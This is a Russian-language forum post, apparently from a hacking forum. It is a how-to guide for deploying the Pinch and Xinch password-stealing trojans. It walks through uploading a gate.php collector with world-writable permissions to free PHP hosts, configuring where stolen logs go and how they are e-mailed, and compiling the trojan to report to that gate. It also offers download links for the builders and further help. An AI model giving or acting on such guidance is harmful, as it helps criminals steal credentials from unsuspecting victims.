Где же взять пинч/ксинч? и как его настроить?
Ссылки на Пинчи и Ксинч в конце статьи, а так же и на гейт.

Лично я в основном заливаю(выкладываю на хостинг) на wwwtu1.ru отлично работает, вот гейт...
1.) Зарегистрируйся на tu1.ru
2.) После того как тебе прийдут пороли от фтп на е-маил, ( если нету фтп менеджера) можешь зайти в обычную виндовс папку, и напиши там где путь свой хост в формате -- , затем зайди в папку WWW и создай там папку gate и нажит правой кнопкой мыши на эту же папку (gate) поставь прова если лучше всего 777 (проблем не будет) далее, заходи в папку gate и заливайте туда сам gate.php (предварительно скачав и разорхивировав, так же поставь прова 777 . Зы в самом файле gate.php пароль по умолчанию стоит genom - об этом пожже ( можешь поменять пароль - открыть в блогноте файл gate.php - там где "конфиг" поменяй переменные , т.е. пароль, е-маил, будут ли отсылаться логи на е-маил и какими пачками....) всё файл gate.php после того как отредактировали мы залили на Ваш хост, и устанавили прова 777, рядом с самим файлом gate.php надо создать папку logs тоже с правами 777 (т.е. если работаете через обычный, виндовский фтп, в параметрах прав все галочки включины). ВСЁ С НАСТРОЙКОЙ НА ХОСТ ЗАКОНЧИЛИ.
3.)Теперь компилируем троя ( этот гейт подходит вроди для всех версий пинча/ксинча, я тестил на 2,99, пинч 3 , ксинче альфа.)  Где в пинче 3 написанно "host" надо вводить вашь хост ( в таком формате: wwwwash_host.tu1.ru , а где Path: ( если создавали папки по инструкции, то /gate/gate.php . А в ксинче надо писать так: wwwwash_host.tu1.ru/gate/gate.php , в пинче 2,99 от слеша пишите так же как и на пинч 3.

ЛИНКИ НА СКАЧКУ:

СКАЧАТЬ ПИНЧ 2,99 by SLASH
скачать gate (гейт)
Для тех кто не совсем понял как настривать - видео мануал по настройке
скачать Ксинч 

P.S. Если у кого-то по тем или иным причинам не получилось настроить пинч или ксинч, то отписывайтесь в этой теме я постараюсь Вам помоч
P.P.S Ещё хостинги на которых я тестировал пинчей и ксинч:  _http://freehostia.com ;  _http://holm.ru ; вообще-то гейт можно залить на любой хостинг где поддерживается PHP! единственное, что к разным хостингам - разный подход...например: freehostia.com на этом хостинге не нужно там где прописывается "Host" вводить вначале пути "www" а просто прописать путь - vash_host.freehostia.com , ну а там где путь к гейту (вторая строка сверху) так же как и на tu1.ru прописывается "/gate/gate.php" - без ковычек разумеется, это при условии что вы создали папку в деректории своего сайта (папку gate)